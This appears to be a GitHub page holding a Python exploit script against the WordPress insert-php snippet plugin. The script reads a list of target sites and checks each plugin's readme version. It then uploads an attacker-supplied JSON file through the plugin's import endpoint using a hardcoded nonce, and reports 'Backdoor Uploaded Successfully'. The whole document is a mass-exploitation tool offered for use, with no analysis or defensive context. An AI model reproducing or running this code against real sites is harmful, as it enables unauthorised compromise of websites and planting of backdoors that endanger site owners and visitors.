CVE-2019/exploit.py at main · ismail0x01/CVE-2019 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import requests
import sys

def check(site):
    site += "/wp-content/plugins/insert-php/readme.txt"
    r = requests.get(site)
    data = r.text
    if "2.2.5" in data:
        return False
    else:
        return True

def exploit(site, file):
    site += "/wp-admin/admin-post.php?post_type=wbcr-snippets&page=import-wbcr_insert_php"
    files = {'wbcr_inp_import_files[]': ('hacker.json', open(file, 'rb'), 'application/json')}
    payload = {
        'action': 'save',
        'duplicate_action': 'ignore',
        'max_file_size': '2097152',
        'wbcr_inp_nonce': '163415d295',
        '_wp_http_referer': '/wordpress/wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php',
        'wbcr_inp_saved': 'Upload files and import'
    }
    r = requests.post(site, files=files, data=payload)
    if r.status_code == 200:
        return True
    return False

try:
    sites = open(sys.argv[1], "r")
    payload_file = sys.argv[2]
except IndexError:
    print("Usage : python", sys.argv[0], "sites.txt file.json")
    exit()
except IOError:
    print("File [", sys.argv[1], "] Not Found !!")
    exit()

for site in sites:
    try:
        site = site.strip()
        if 'http://' not in site and 'https://' not in site:
            site = "http://" + site
        if check(site):
            print("[+] Vulnerable =>", site)
            if exploit(site, payload_file):
                print("[+] Backdoor Uploaded Successfully !!\n")
            else:
                print("[-] Failed To Upload Backdoor\n")
        else:
            print("[-] Not Vulnerable =>", site, "\n")
    except Exception as e:
        print("[-] Error:", e)
## Just Edit by Mesh Ismail Mohamed {{ismail0x01}}